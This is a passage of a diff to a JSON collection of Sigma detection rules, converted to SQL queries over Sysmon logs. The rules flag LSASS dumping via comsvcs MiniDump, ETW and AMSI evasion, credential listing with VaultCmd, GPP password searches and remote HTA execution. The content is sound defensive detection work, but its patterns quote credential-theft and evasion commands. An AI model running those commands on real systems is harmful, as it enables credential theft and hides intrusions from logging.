rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_service_tamper_for_persistence.yml" + "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" }, { - "title": "ZxShell Malware", - "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", + "title": "Disable of ETW Trace", + "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", "status": "test", - "description": "Detects a ZxShell start by the called and well-known function name", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", + "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.003", "attack.defense_evasion", - "attack.t1218.011", - "attack.s0412", - "attack.g0001" + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' 
ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_zxshell.yml" + "filename": "proc_creation_win_susp_etw_trace_evasion.yml" }, { - "title": "Windows Credential Manager Access via VaultCmd", - "id": "58f50261-c53b-4c88-bd12-1d71f12eda4c", + "title": "Rundll32 Execution Without DLL File", + "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", "status": "experimental", - "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", - "author": "frack113", - "tags": [ - "attack.credential_access", - "attack.t1555.004" - ], + "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", + "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VaultCmd.exe' ESCAPE '\\' OR OriginalFileName = 'VAULTCMD.EXE') AND CommandLine LIKE '%/listcreds:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Program Files\\\\Internet 
Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_vaultcmd_list_creds.yml" + "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" }, { - "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", - "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", - "status": "test", - "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "Suspicious Shells Spawn by SQL Server", + 
"id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "status": "experimental", + "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", + "author": "FPT.EagleEye Team, wagga", "tags": [ - "attack.lateral_movement", - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" - ], - "falsepositives": [ - "Legitimate administration activity" + "attack.t1505.003", + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentImage LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" + "filename": "proc_creation_win_mssql_susp_child_process.yml" }, { - "title": "Suspicious Microsoft Office Child Process", - "id": "438025f9-5856-4663-83f7-52f878a70a50", - "status": "test", - "description": "Detects a suspicious 
process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", - "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "title": "Potential AMSI Bypass Using NULL Bits - ProcessCreation", + "id": "92a974db-ab84-457f-9ec0-55db83d7a825", + "status": "experimental", + "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR 
Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR CommandLine LIKE '%#%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_susp_child_processes.yml" + 
"filename": "proc_creation_win_powershell_amsi_null_bits_bypass.yml" }, { - "title": "Schtasks Creation Or Modification With SYSTEM Privileges", - "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", + "title": "Renamed Plink Execution", + "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", "status": "experimental", - "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", + "description": "Detects the execution of a renamed version of the Plink binary", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\plink.exe' 
ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_system.yml" + "filename": "proc_creation_win_renamed_plink.yml" }, { - "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", - "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", - "status": "test", - "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Query Usage To Exfil Data", + "id": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", + "status": "experimental", + "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.005", - "attack.t1059.001", - "attack.t1218" + "attack.execution" ], "falsepositives": [ - "Administrative scripts", - "Microsoft SCCM" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program 
Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%:\\\\Windows\\\\System32\\\\query.exe' ESCAPE '\\' AND (CommandLine LIKE '%session >%' ESCAPE '\\' OR CommandLine LIKE '%process >%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" + "filename": "proc_creation_win_query_session_exfil.yml" }, { - "title": "Renamed AdFind Execution", - "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", - "status": "test", - "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. 
It is used to domain trust discovery to plan out subsequent steps in the attack chain.", - "author": "Florian Roth (Nextron Systems)", + "title": "Conhost Spawned By Uncommon Parent Process", + "id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", + "status": "experimental", + "description": "Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.", + "author": "Tim Rauch", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 
'AdFind.exe') AND NOT (Image LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\conhost.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\')) AND NOT (((ParentCommandLine LIKE '%-k apphost -s AppHostSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k imgsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k localService -p -s RemoteRegistry%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k LocalSystemNetworkRestricted -p -s NgcSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetSvcs -p -s NcaSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s NetSetupSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s wlidsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetworkService -p -s DoSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s AppXSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s ClipSVC%' ESCAPE '\\')))) AND NOT (((ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_renamed_adfind.yml" + "filename": "proc_creation_win_conhost_uncommon_parent.yml" }, { - "title": "Suspicious Recursive Takeown", - "id": "554601fb-9b71-4bcc-abf4-21a611be4fde", + "title": "Ie4uinit Lolbin Use From Invalid Path", + "id": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", 
"status": "experimental", - "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", + "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.t1218" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity" + "ViberPC updater calls this binary with the following commandline \"ie4uinit.exe -ClearIconCache\"" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\takeown.exe' ESCAPE '\\' AND CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%/r%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ie4uinit.exe' ESCAPE '\\' OR OriginalFileName = 'IE4UINIT.EXE') AND NOT (((CurrentDirectory LIKE 'c:\\\\windows\\\\system32\\\\' ESCAPE '\\' OR CurrentDirectory LIKE 'c:\\\\windows\\\\sysWOW64\\\\' ESCAPE '\\')) OR (CurrentDirectory = '')))" ], - "filename": "proc_creation_win_takeown_recursive_own.yml" + "filename": "proc_creation_win_lolbin_ie4uinit.yml" }, { - "title": "Certificate Exported Via Certutil.EXE", - "id": "3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5", - "status": "test", - "description": "Detects the execution of the certutil with the \"exportPFX\" flag which allows the utility to export certificates.", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote Access Tool - NetSupport Execution", + "id": "758ff488-18d5-4cbe-8ec4-02b6285a434f", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote access 
software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "There legitimate reasons to export certificates. Investigate the activity to determine if it's benign" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-exportPFX %' ESCAPE '\\' OR CommandLine LIKE '%/exportPFX %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'NetSupport Client Configurator' OR Product = 'NetSupport Remote Control' OR Company = 'NetSupport Ltd' OR OriginalFileName = 'PCICFGUI.EXE'))" ], - "filename": "proc_creation_win_certutil_export_pfx.yml" + "filename": "proc_creation_win_remote_access_tools_netsupport.yml" }, { - "title": "Findstr GPP Passwords", - "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", - "status": "test", - "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. 
This value can be decrypted with gpp-decrypt.", + "title": "Suspicious X509Enrollment - Process Creation", + "id": "114de787-4eb2-48cc-abdb-c0b449f93ea4", + "status": "experimental", + "description": "Detect use of X509Enrollment", "author": "frack113", - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR CommandLine LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_gpp_passwords.yml" + "filename": "proc_creation_win_powershell_x509enrollment.yml" }, { - "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", - "id": "b98d0db6-511d-45de-ad02-e82a98729620", + "title": "Potential NTLM Coercion Via Certutil.EXE", + "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", "status": "experimental", - "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", + "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.005" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image 
